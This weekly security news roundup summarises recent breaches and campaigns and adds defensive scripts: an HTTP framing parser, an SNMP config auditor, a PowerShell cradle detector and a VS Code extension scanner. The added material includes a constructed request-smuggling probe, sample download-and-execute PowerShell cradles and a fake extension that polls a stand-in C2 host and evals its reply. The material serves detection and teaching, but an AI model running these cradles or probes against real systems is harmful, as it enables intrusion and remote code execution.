Same stuff, different week. There were some wins on the law-enforcement side, but the adversaries aren't doing too "badly" either.
Supply-chain attacks through VS Code extensions have reached the point where extension installs need a review of their own, in addition to the review every code change already gets.


Also included are two longer, food-for-thought long-form articles at the very end. I found both very interesting, and they stayed with me for a while after reading them.

1. Nation-State Hackers Breach F5 BIG-IP Development Environment, Steal Source Code and Vulnerability Data

F5 Networks confirmed that a "highly sophisticated nation-state threat actor" maintained long-term access to its BIG-IP product development and engineering knowledge platforms, exfiltrating portions of source code, undisclosed vulnerability details, and limited customer configuration data. 

F5’s BIG-IP platform underpins application delivery and security for many large enterprises and government systems. It’s widely used as a load balancer and reverse proxy, managing traffic and protecting critical web applications.

The breach elevates risk for targeted attacks against unpatched F5 devices and has prompted CISA to mandate immediate inventory and patching for federal agencies.

Key Details

  • Intrusion discovered in August 2025; public disclosure occurred Oct. 15 under DOJ guidance.
  • Stolen files include segments of BIG-IP source code and details of vulnerabilities that F5 was still working to fix.
  • CISA issued Emergency Directive ED 26-01, requiring federal civilian agencies to inventory and update BIG-IP devices by Oct. 22.

Next Steps

  • Apply the latest patches for BIG-IP, F5OS, BIG-IP Next, BIG-IQ, and APM clients immediately.
  • Consider replacing BIG-IP services: the actors now hold previously undisclosed vulnerability details and source code, which makes it easier for them to develop new exploits.

Read more at: Dark Reading, The Hacker News, CSO Online, Cybersecurity News, CyberScoop


2. Microsoft Revokes 200+ Abused Azure Code-Signing Certificates in Rhysida Ransomware Campaign

Microsoft disrupted a Rhysida ransomware operation by revoking over 200 Azure Trusted Signing certificates that Vanilla Tempest had used to sign fake Microsoft Teams installers carrying the Oyster backdoor. Because the installers carried valid signatures and were served from SEO-poisoned domains, they passed signature-based defenses and the search results led victims straight to the malicious downloads.

Key Details

  • Vanilla Tempest (aka Vice Society) hosted malicious MSTeamsSetup.exe files on SEO-poisoned domains.
  • Fake installers dropped a loader that installed Oyster backdoor before deploying Rhysida ransomware.
  • Attackers also acquired code-signing certificates from SSL.com, DigiCert and GlobalSign.
  • Azure Trusted Signing requires a Microsoft Entra tenant and a three-year organizational history, raising vetting concerns.

Read more at Dark Reading


3. Critical ASP.NET Core HTTP Request Smuggling Flaw Earns Record-high 9.9 CVSS

Microsoft has released patches for CVE-2025-55315, a critical HTTP request smuggling bug in Kestrel, the web server component of ASP.NET Core. Its 9.9 severity rating is the highest the framework has received. An attacker with low-privileged (authenticated) access can embed a second request inside a legitimate one and have it processed without the checks applied to the first, which can mean bypassing authentication, skipping CSRF checks or performing injection attacks; the real impact depends on application logic and deployment.

Key Details

  • All supported ASP.NET Core versions (8, 9, 10) and legacy 2.3 are affected.
  • Attackers need only authenticated access to smuggle a second HTTP request past security checks.
  • Microsoft’s 9.9 score reflects worst-case security feature bypass “changing scope,” not typical deployments.

Next Steps

  • Upgrade to the .NET 8.0.21, .NET 9.0.10 or .NET 10.0.0-rc.2 runtime, or to Microsoft.AspNetCore.Server.Kestrel.Core 2.3.6 for apps still on the 2.x package.
  • Review custom request-handling code for unchecked header parsing.
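
To make the bug class concrete, here is an added example (not Kestrel's code and not an exploit for CVE-2025-55315): a minimal HTTP request framer that can be run in three modes over the same bytes. "cl_first" trusts Content-Length when Transfer-Encoding is also present, "te_first" trusts the chunked encoding, and "strict" refuses ambiguous framing outright. The probe request, host names and cookie are constructed for the demo. Run with two hops that pick different modes and the second, smuggled request is seen by only one of them, which is exactly how an authenticated POST can carry a request past the front hop's checks.

```python
"""Added example for the request-smuggling class behind CVE-2025-55315; it is
not Kestrel's code and not an exploit for the CVE.

A smuggling bug is a framing disagreement: two hops (or two code paths) decide
differently where one HTTP request ends and the next begins. The parser below
runs in three modes over the same bytes: "cl_first" trusts Content-Length when
Transfer-Encoding is also present, "te_first" trusts the chunked encoding, and
"strict" refuses ambiguous framing. The sample request is constructed here.
"""
import re

CRLF = b"\r\n"


class FramingError(ValueError):
    """Raised when the request cannot be framed unambiguously."""


def parse_head(raw):
    """Split the request head; return (request_line, [(name, value)], head_len) or None."""
    end = raw.find(CRLF + CRLF)
    if end == -1:
        return None
    lines = raw[:end].decode("iso-8859-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, end + 4


def read_chunked(raw, pos):
    """Consume a chunked body at pos; return (body, pos after the terminating CRLF)."""
    body = b""
    while True:
        line_end = raw.find(CRLF, pos)
        if line_end == -1:
            raise FramingError("truncated chunk-size line")
        # Chunk extensions (";name=value") are discarded here; a strict parser
        # must validate them too, since lenient handling there is another desync source.
        size_field = raw[pos:line_end].split(b";", 1)[0].strip()
        if not re.fullmatch(rb"[0-9A-Fa-f]{1,8}", size_field):
            raise FramingError("malformed chunk size %r" % size_field)
        size = int(size_field, 16)
        pos = line_end + 2
        if size == 0:
            if raw[pos:pos + 2] != CRLF:
                raise FramingError("trailers are not accepted")
            return body, pos + 2
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != CRLF:
            raise FramingError("truncated chunk")
        body += chunk
        pos += size + 2


def split_requests(raw, mode):
    """Frame every request in the byte buffer; return [(request_line, body), ...]."""
    out, pos = [], 0
    while pos < len(raw):
        parsed = parse_head(raw[pos:])
        if parsed is None:
            raise FramingError("incomplete request head")
        request_line, headers, head_len = parsed
        pos += head_len
        te = [v.lower() for k, v in headers if k == "transfer-encoding"]
        cl = [v for k, v in headers if k == "content-length"]
        if mode == "strict":
            if te and cl:
                raise FramingError("Transfer-Encoding and Content-Length both present")
            if len(set(cl)) > 1:
                raise FramingError("conflicting Content-Length values")
            if te and te != ["chunked"]:
                raise FramingError("unsupported Transfer-Encoding %r" % te)
            if cl and not re.fullmatch(r"[0-9]+", cl[0]):
                raise FramingError("malformed Content-Length %r" % cl[0])
        if "chunked" in te and not (mode == "cl_first" and cl):
            body, pos = read_chunked(raw, pos)
        elif cl:
            n = int(cl[0])
            body = raw[pos:pos + n]
            if len(body) != n:
                raise FramingError("truncated body")
            pos += n
        else:
            body = b""
        out.append((request_line, body))
    return out


# Constructed CL.TE probe (not the CVE's trigger): an authenticated POST whose
# Content-Length covers a zero-length chunk plus a complete second request.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app\r\n\r\n"
POST_BODY = b"0\r\n\r\n" + SMUGGLED
PROBE = (
    b"POST /comment HTTP/1.1\r\n"
    b"Host: app\r\n"
    b"Cookie: session=low-privileged-user\r\n"
    b"Content-Length: " + str(len(POST_BODY)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + POST_BODY
)


def demo():
    """Frame PROBE three ways; return the request lines each hop would see."""
    front = [line for line, _ in split_requests(PROBE, "cl_first")]
    back = [line for line, _ in split_requests(PROBE, "te_first")]
    try:
        split_requests(PROBE, "strict")
        strict = "accepted"
    except FramingError as exc:
        strict = "rejected: %s" % exc
    return front, back, strict


if __name__ == "__main__":
    front, back, strict = demo()
    print("Content-Length-first hop sees:", front)   # one request; the GET rides inside its body
    print("chunked-first hop sees:      ", back)    # two requests; the GET skips the first hop's checks
    print("strict parser:               ", strict)
```

The practical takeaway for the "review custom request-handling code" step: anything that parses raw HTTP itself (middleware, reverse proxies, custom transports) should behave like the strict mode and reject conflicting or duplicate framing headers instead of picking one.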

Read more at CSO Online, Bleeping Computer


4. Attackers Exploit Cisco SNMP Flaw to Deploy Fileless Linux Rootkits on Legacy Switches

A new "Operation Zero Disco" campaign leverages CVE-2025-20352, an SNMP stack-overflow in Cisco IOS and IOS XE, to achieve remote code execution and install fileless Linux rootkits on unpatched 9400, 9300 and 3750G series switches. 

The rootkits hook into the IOS daemon, set a universal “disco” password, toggle or delete logs, reset timestamps and open a UDP-based backdoor, enabling persistent, stealthy access and potential lateral movement.

Key Details

  • Targets Cisco 9400, 9300 and legacy 3750G switches running older Linux stacks without EDR.
  • Rootkit hooks into IOSd memory, creates universal password containing “disco,” hides configuration changes.

Next Steps

  • Apply Cisco’s fixed IOS/IOS XE releases for CVE-2025-20352.
  • Restrict SNMP reachability to management hosts with ACLs, prefer SNMPv3 with authentication and privacy over v1/v2c, and replace guessable community strings.
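
The exposure that makes an SNMP bug like this reachable is visible in the running-config. As an added example (not code from Cisco, Trend Micro or the article), the script below audits the SNMP section of a Cisco IOS/IOS XE config text for communities with no source ACL, guessable strings, read-write access, ACLs that are referenced but never defined, and SNMPv3 groups or users without privacy. The sample config is constructed; the ACL and community names in it are invented. It is a text audit of management-plane exposure, not a check that the device is patched.

```python
"""Added example, not code from Cisco, Trend Micro or the article.

Audits the SNMP section of a Cisco IOS/IOS XE running-config for the exposure
that makes a bug like CVE-2025-20352 reachable: communities with no source ACL,
guessable community strings, read-write access, and SNMPv3 principals without
privacy. The sample config is constructed for the demo.
"""
import re

GUESSABLE = {"public", "private", "cisco", "admin", "snmp"}


def defined_acls(lines):
    """Collect numbered and named ACL identifiers declared in the config."""
    acls = set()
    for line in lines:
        m = re.match(r"(?:ip )?access-list\s+(?:standard\s+|extended\s+)?(\S+)", line)
        if m:
            acls.add(m.group(1))
    return acls


def parse_community(rest):
    """Return (mode, acl) from the tokens after 'snmp-server community NAME'."""
    mode, acl, i = "RO", None, 0
    while i < len(rest):
        tok = rest[i]
        if tok.lower() in ("view", "ipv6"):   # these keywords take an argument
            i += 2
            continue
        if tok.upper() in ("RO", "RW"):
            mode = tok.upper()
        else:
            acl = tok                          # trailing bare token is the ACL
        i += 1
    return mode, acl


def audit_snmp(config_text):
    """Return [(severity, config_line, reason), ...] for SNMP weaknesses found."""
    lines = [l.strip() for l in config_text.splitlines()]
    acls = defined_acls(lines)
    findings = []
    for line in lines:
        m = re.match(r"snmp-server community\s+(\S+)(.*)$", line)
        if m:
            community = m.group(1)
            mode, acl = parse_community(m.group(2).split())
            findings.append(("info", line, "SNMPv1/v2c community: cleartext, no authentication"))
            if community.lower() in GUESSABLE:
                findings.append(("high", line, "guessable community string %r" % community))
            if mode == "RW":
                findings.append(("high", line, "read-write community"))
            if acl is None:
                findings.append(("high", line, "reachable from any source (no ACL)"))
            elif acl not in acls:
                findings.append(("medium", line, "ACL %s referenced but not defined" % acl))
            continue
        m = re.match(r"snmp-server group\s+\S+\s+v3\s+(noauth|auth|priv)\b", line)
        if m and m.group(1) != "priv":
            findings.append(("medium", line, "SNMPv3 group without privacy (%s)" % m.group(1)))
            continue
        m = re.match(r"snmp-server user\s+\S+\s+\S+\s+v3\b(.*)$", line)
        if m and " priv " not in m.group(1) + " ":
            findings.append(("medium", line, "SNMPv3 user without privacy"))
    return findings


# Constructed running-config excerpt: one community is locked to a management
# host, the others are exposed in the ways the audit looks for.
SAMPLE_CONFIG = """\
hostname core-sw1
!
access-list 10 permit 10.0.100.5
access-list 10 deny   any log
!
snmp-server community public RO
snmp-server community netmon RO 10
snmp-server community ops RW 20
snmp-server group NMS v3 auth
snmp-server user nmsuser NMS v3 auth sha S3cretAuth
snmp-server user nmsuser2 NMS v3 auth sha S3cretAuth priv aes 128 S3cretPriv
"""

if __name__ == "__main__":
    for severity, line, reason in audit_snmp(SAMPLE_CONFIG):
        print("%-6s %-62s %s" % (severity, line, reason))
```

Feed it the output of `show running-config` (the script only reads text, so it can run against a config backup). The clean line in the sample, `snmp-server community netmon RO 10` with ACL 10 permitting a single NMS host, is the shape the "restrict reachability and enforce ACLs" step asks for.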

Read more at The Hacker News, CSO Online, BleepingComputer, Trend Micro


5. North Korean Hackers Adopt EtherHiding to Deliver Malware via Smart Contracts

A DPRK-linked group tracked as UNC5342 has begun embedding malicious JavaScript loaders inside Ethereum and BNB Smart Chain contracts using the EtherHiding technique, the first known state-sponsored use of a public blockchain as a takedown-resistant C2 and malware-hosting platform.

The multi-stage attack chain—deployed through fake recruiting lures—fetches and updates payloads on-chain to steal developer data and siphon cryptocurrency without relying on takedown-prone servers.

Key Details

  • UNC5342 targets developers via LinkedIn recruitment scams, moving chats to Telegram/Discord.
  • Attack stages: npm-based initial downloader → BeaverTail stealer → JADESNOW loader → InvisibleFerret backdoor.
  • Smart contracts on Ethereum and BSC store the payloads encoded with Base64 and XOR; the loader reads them with read-only contract calls, so retrieval leaves no transaction on-chain and the operators can swap payloads by updating the contract.

Read more at The Hacker News


6. Europol-led Bust Disrupts SIM-Card Rental Network Behind €5 Million in Telecom Fraud

International law enforcement dismantled a network selling phone numbers from over 80 countries to scammers, seizing 40,000 SIM cards, 1,200 SIM boxes and five servers.  

Investigators linked the service to more than 3,000 fraud cases and over €5 million in losses, while criminals used the infrastructure to create 49 million fake online accounts for phishing, extortion and other crimes.

Key Details

  • Five suspects arrested in Latvia, including the alleged organizer.
  • Two seized websites (gogetsms.com, apisim.com) powered a global SIM-provisioning platform.
  • Fraud concentrated in Austria and Latvia, with combined losses exceeding €5 million.
  • Service enabled creation of over 49 million fake accounts used in phishing, investment scams and CSAM distribution.

Read more at The Record, Europol


7. New Pixnapping Attack Steals 2FA Codes and Screen Data on Android

Researchers have demonstrated “pixnapping,” a side-channel attack in which a malicious Android app steals on-screen secrets, from Google Authenticator 2FA codes to Signal messages, by forcing the victim app's pixels through the rendering pipeline and reconstructing them, in under 30 seconds for a 2FA code.
The vulnerability (CVE-2025-48561) affects modern devices running Android 13–16, including Google Pixel and Samsung Galaxy models. Google’s September patch was bypassed; a fuller fix is due in December’s security bulletin.

Key Details

  • Pixnapping abuses Android intents and semi-transparent activities to force victim app pixels into the rendering pipeline and infer their color via GPU timing.
  • Demonstrated recovery: 2FA codes from Google Authenticator in under 30 seconds; messages from Signal, Gmail, Venmo and Maps timelines also exfiltrated.
  • Affected devices tested: Pixel 6-9 and Galaxy S25 on Android 13-16; underlying API and hardware side-channel exist on most modern Android phones.
  • Google’s September patch (partial mitigation) was circumvented; full mitigation slated for December Android security bulletin.

Next Steps

  • Track the December Android security bulletin and roll it out as soon as it ships; until then treat on-screen secrets on managed Android devices as exposed to any installed app, and keep app installs to trusted sources since the attack needs a malicious app on the device.

Read more at Dark Reading, BleepingComputer


8. Microsoft Reports 32% Rise in Identity Attacks Fueled by Stolen Passwords

Microsoft’s H1 2025 Digital Defense Report shows identity-based attacks surged 32%, with over 97% relying on password guessing, leaks and social-engineering scams. Compromised credentials now drive account takeovers, data theft and ransomware, highlighting gaps in password hygiene and help-desk controls.

Key Details

  • 97% of identity attacks are password-based, up 32% in six months.
  • Infostealer malware and help-desk scams (vishing, Quick Assist) are on the rise.
  • Most targeted: IT companies and national/local government agencies.

Next Steps

  • Enforce MFA and conditional access on all user accounts.
  • Harden help-desk workflows against vishing and remote-assistance (Quick Assist) scams.

Read more at The Record


9. TikTok-Based Campaign Uses Self-Compiling PowerShell Malware for AuroStealer Deployment

Cybercriminals are tricking TikTok users into running a one-line PowerShell command under the guise of free software activation, which delivers a multi-stage malware chain culminating in AuroStealer data theft. The campaign employs scheduled-task persistence and on-the-fly C# compilation to inject shellcode in memory and evade detection. 

Key Details

  • Victims are instructed to run a malicious PowerShell command that fetches a first-stage PowerShell script (SHA-256 6D897B…C6B23, 17/63 VirusTotal detections).
  • The initial payload downloads updater.exe from file-epq [.] pages [.] dev, identified as AuroStealer targeting credentials and system data.
  • Persistence via scheduled tasks named like “MicrosoftEdgeUpdateTaskMachineCore” ensures execution at user logon.
  • Third stage (source.exe, SHA256: db57e4…67011) compiles and runs C# code at runtime via csc.exe to perform in-memory shellcode injection.

Next Steps

  • Block or monitor PowerShell one-liners that pipe irm/iwr output into iex from unknown domains.
  • Audit new scheduled tasks matching “*UpdateTaskMachine*” and confirm each one's action is the genuine vendor updater binary.
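
Both steps can be scripted. As an added example (not code from the article or CybersecurityNews), the block below does two things: it classifies PowerShell script-block text (the kind logged as event 4104) as a download-and-execute cradle after undoing cheap obfuscation such as backticks and mixed case, and it checks scheduled tasks whose names imitate a browser updater against the updater's genuine install path. The sample script blocks, task entries, domains and the allow-listed updater paths are constructed or assumed for the demo, not campaign indicators. The task check also handles the false positive a naive `*UpdateTaskMachine*` match produces for the real Google updater task.

```python
"""Added example, not code from the article or CybersecurityNews.

(1) Flag PowerShell script blocks that fetch remote content and execute it in
the same line, after undoing cheap obfuscation (backticks, casing, whitespace).
(2) Flag scheduled tasks whose name imitates a vendor updater but whose action
is not the genuine updater binary. All samples and the updater allow-list are
constructed or assumed for the demo, not indicators from the campaign.
"""
import re

FETCH = re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b")
RUN = re.compile(r"\b(iex|invoke-expression)\b|&\s*\(|\bstart-process\b")
URL = re.compile(r"https?://[^\s'\"()]+")


def normalize_ps(text):
    """Undo common cradle obfuscation: backtick splitting, casing, odd whitespace."""
    text = text.replace("`", "")          # i`e`x -> iex
    return re.sub(r"\s+", " ", text).strip().lower()


def classify_script_block(text):
    """Return {"cradle": bool, "urls": [...]} for one script-block text."""
    norm = normalize_ps(text)
    cradle = bool(FETCH.search(norm) and RUN.search(norm))
    return {"cradle": cradle, "urls": URL.findall(norm)}


# Assumed allow-list: install paths of the updaters whose task names get imitated.
LEGIT_UPDATERS = {
    "microsoftedgeupdatetaskmachine": {
        r"c:\program files (x86)\microsoft\edgeupdate\microsoftedgeupdate.exe",
        r"c:\program files\microsoft\edgeupdate\microsoftedgeupdate.exe",
    },
    "googleupdatetaskmachine": {
        r"c:\program files (x86)\google\update\googleupdate.exe",
    },
}


def suspicious_task(name, execute):
    """True if a task named like a vendor updater runs anything but that updater."""
    lname = name.lower()
    exe = execute.strip().strip('"').lower()
    for prefix, paths in LEGIT_UPDATERS.items():
        if lname.startswith(prefix):
            return exe not in paths
    # Borrows the "...UpdateTaskMachine..." naming but matches no known vendor.
    return "updatetaskmachine" in lname


# Constructed samples (not the campaign's actual command, domains or task).
SAMPLE_BLOCKS = [
    "irm https://activation.example.invalid/run | iex",
    "I`E`X (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/s.ps1')",
    "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",
    "Invoke-WebRequest https://files.example.invalid/report.csv -OutFile C:\\temp\\report.csv",
]
SAMPLE_TASKS = [
    ("MicrosoftEdgeUpdateTaskMachineCore", r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"),
    ("MicrosoftEdgeUpdateTaskMachineCore", r"C:\Users\victim\AppData\Roaming\updater.exe"),
    ("GoogleUpdateTaskMachineUA", r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"),
    ("OneDriveUpdateTaskMachine", r"C:\Users\victim\AppData\Local\Temp\source.exe"),
]


def demo():
    """Return the verdicts for the constructed samples."""
    blocks = [classify_script_block(b)["cradle"] for b in SAMPLE_BLOCKS]
    tasks = [suspicious_task(n, e) for n, e in SAMPLE_TASKS]
    return blocks, tasks


if __name__ == "__main__":
    blocks, tasks = demo()
    for text, hit in zip(SAMPLE_BLOCKS, blocks):
        print("CRADLE " if hit else "ok     ", text[:72])
    for (name, exe), hit in zip(SAMPLE_TASKS, tasks):
        print("SUSPECT" if hit else "ok     ", name, "->", exe)
```

On a real host the inputs come from `Get-WinEvent` on the Microsoft-Windows-PowerShell/Operational log (event 4104, which requires script-block logging to be enabled) and from `Get-ScheduledTask`, whose Actions carry the Execute path; the fourth sample shows a fetch with no execution sink, which is deliberately not flagged.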

Read more at CybersecurityNews


10. TigerJack Campaign Uses Malicious VS Code Extensions to Steal Code, Mine Crypto, and Persist Undetected

Threat actor "TigerJack" has published at least 11 malicious Visual Studio Code and OpenVSX extensions that quietly exfiltrate source code, deploy cryptominers, and fetch remote JavaScript for backdoor control. Two of the packages, "C++ Playground" and "HTTP Format", passed 17,000 downloads between them.

Key Details

  • 11 extensions across three publisher accounts (ab-498, 498, 498-00).
  • “C++ Playground” and “HTTP Format” amassed 17,000+ downloads before removal from the VS Code Marketplace.
  • Extensions poll hardcoded endpoints every 20 minutes to execute new payloads.
  • OpenVSX marketplace hosts active variants due to minimal malware scanning.

Next Steps

  • Inventory installed VS Code/OpenVSX extensions and remove unverified ones.
  • Require peer review and sandbox testing for new developer tools.
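
An extension review needs something to start from. As an added example (not code from the article, Microsoft or the OpenVSX project), the script below walks a VS Code extensions directory, reads each extension's package.json and entry-point script, and reports the traits a reviewer should look at first: a publisher ID named in the TigerJack reporting, activation on every startup, and source that polls the network on a timer, evaluates fetched code, spawns processes, or pairs file reads with network calls. The trait patterns are review heuristics I chose, not indicators, and the demo builds a throwaway extension tree in a temp directory; for real use point it at ~/.vscode/extensions, which is where `main()` looks.

```python
"""Added example, not code from the article, Microsoft or the OpenVSX project.

Scans a VS Code extensions directory and lists the traits a reviewer should
look at before trusting an extension. The trait patterns are assumed review
heuristics, not a malware verdict; the demo's extension tree is constructed.
"""
import json
import re
import tempfile
from pathlib import Path

# Publisher IDs named in the TigerJack report (from the article).
REPORTED_PUBLISHERS = {"ab-498", "498", "498-00"}

# Source traits worth a human look (assumed heuristics, not indicators).
TRAITS = {
    "timer":   re.compile(r"\bset(?:Interval|Timeout)\s*\("),
    "network": re.compile(r"\bhttps?\.(?:get|request)\s*\(|\bfetch\s*\(|\baxios\b|\bnode-fetch\b"),
    "exec":    re.compile(r"\bchild_process\b|\b(?:execSync|spawnSync|spawn|exec)\s*\("),
    "eval":    re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.runIn\w*\s*\("),
    "files":   re.compile(r"\bfs\.(?:readFile|readFileSync|readdir|readdirSync|createReadStream)\s*\("),
}


def entry_point(ext_dir, meta):
    """Resolve package.json 'main' (which may omit the .js suffix) to a file, or None."""
    main = meta.get("main")
    if not main:
        return None
    path = ext_dir / main
    if path.is_file():
        return path
    alt = path.with_name(path.name + ".js")
    return alt if alt.is_file() else None


def scan_extension(ext_dir):
    """Return {"id", "version", "flags", "traits"} for one extension directory, or None."""
    manifest = ext_dir / "package.json"
    if not manifest.is_file():
        return None
    try:
        meta = json.loads(manifest.read_text(encoding="utf-8"))
    except (ValueError, UnicodeDecodeError):
        return {"id": ext_dir.name, "version": "?", "flags": ["unreadable package.json"], "traits": []}
    publisher = str(meta.get("publisher", "")).lower()
    flags = []
    if publisher in REPORTED_PUBLISHERS:
        flags.append("publisher named in TigerJack report")
    events = meta.get("activationEvents") or []
    if "*" in events or "onStartupFinished" in events:
        flags.append("activates on every VS Code start")
    traits = set()
    entry = entry_point(ext_dir, meta)
    if entry is not None:
        source = entry.read_text(encoding="utf-8", errors="replace")
        traits = {name for name, rx in TRAITS.items() if rx.search(source)}
    if {"timer", "network"} <= traits:
        flags.append("polls the network on a timer")
    if {"network", "eval"} <= traits:
        flags.append("fetches and evaluates remote code")
    if "exec" in traits:
        flags.append("spawns processes")
    if {"files", "network"} <= traits:
        flags.append("reads files and talks to the network")
    return {
        "id": "%s.%s" % (publisher, meta.get("name", ext_dir.name)),
        "version": str(meta.get("version", "?")),
        "flags": flags,
        "traits": sorted(traits),
    }


def scan_extensions_dir(root):
    """Scan every extension under root; return only those with at least one flag."""
    results = []
    for ext_dir in sorted(Path(root).iterdir()):
        if ext_dir.is_dir():
            report = scan_extension(ext_dir)
            if report and report["flags"]:
                results.append(report)
    return results


def demo():
    """Build two constructed extensions (one poller, one benign) and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = Path(tmp) / "498.cpp-playground-1.0.0"
        (bad / "out").mkdir(parents=True)
        (bad / "package.json").write_text(json.dumps({
            "publisher": "498", "name": "cpp-playground", "version": "1.0.0",
            "main": "./out/extension", "activationEvents": ["*"],
        }))
        (bad / "out" / "extension.js").write_text(
            "const https = require('https');\n"
            "function beacon() { https.get('https://c2.example.invalid/t', r => {\n"
            "  let b=''; r.on('data', d => b += d); r.on('end', () => eval(b)); }); }\n"
            "setInterval(beacon, 20 * 60 * 1000);\n"   # 20-minute poll, as reported
        )
        good = Path(tmp) / "vendor.formatter-2.1.0"
        good.mkdir()
        (good / "package.json").write_text(json.dumps({
            "publisher": "vendor", "name": "formatter", "version": "2.1.0",
            "main": "./extension.js", "activationEvents": ["onLanguage:json"],
        }))
        (good / "extension.js").write_text("exports.activate = () => {};\n")
        return scan_extensions_dir(tmp)


def main():
    real = Path.home() / ".vscode" / "extensions"
    for r in scan_extensions_dir(real) if real.is_dir() else demo():
        print(r["id"], r["version"], "->", "; ".join(r["flags"]))


if __name__ == "__main__":
    main()
```

Bundled or minified extensions will defeat plain regexes, so treat a hit as a prompt to read the code rather than a verdict, and treat an entry point that cannot be read at all as a reason to sandbox the extension before installing it anywhere that holds source code.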

Read more at CSO Online


Food for Thought: Long-Form Recommendations


11. Enterprises’ Phishing Training Proves Ineffective, Calls for New Behavioral Approaches

Despite widespread annual and embedded phishing exercises, recent research shows no measurable drop in employees’ click-through rates or susceptibility. Low engagement—up to half of simulated phishing trainings go uncompleted—and poor information retention mean organizations remain exposed. Phishing training must shift from checkbox compliance to behavior-driven, context-aware interventions and back them with metrics and technical controls.

Key Details

  • Phishing causes 15% of data breaches, per IBM.
  • Study of ~20,000 UCSD Health staff found no difference in failure rates post-training.
  • 37–51% of embedded phishing trainings see zero engagement.
  • PC users click risky links more often than mobile users, suggesting device impacts behavior.

Next Steps

  • Track real-world phishing click-rates by cohort and device.
  • Introduce gamified, scenario-based exercises with small rewards.
  • Back training with technical controls: multi-factor authentication (ideally phishing-resistant) and automated phishing detection, so a single click is not a compromise.

Read more at CSO Online


12. The Truth About Consistent Chinese Espionage in the UK

UK officials uncovered a Chinese-sponsored breach that accessed “official-sensitive” and “secret” government data via a critical data exchange hub for at least ten years after its sale to a China-aligned entity. Ministers even considered razing the facility to eliminate hidden backdoors before choosing a targeted incident response and patching approach.  The episode highlights the imperative for CISOs to enforce stringent supply-chain oversight, continuous threat hunting, and robust controls over edge devices and VPN access.

Key Details

  • Breaches spanned low- and mid-classification networks; no “top secret” data was exfiltrated.
  • Then-PM Boris Johnson commissioned a classified review of Chinese digital surveillance and cyber threats.
  • Experts suggest the initial compromise likely exploited a VPN vulnerability, followed by privilege escalation.
  • State-linked APTs may employ Operational Relay Boxes to mask long-term presence and evade detection.

Read more at The Spectator

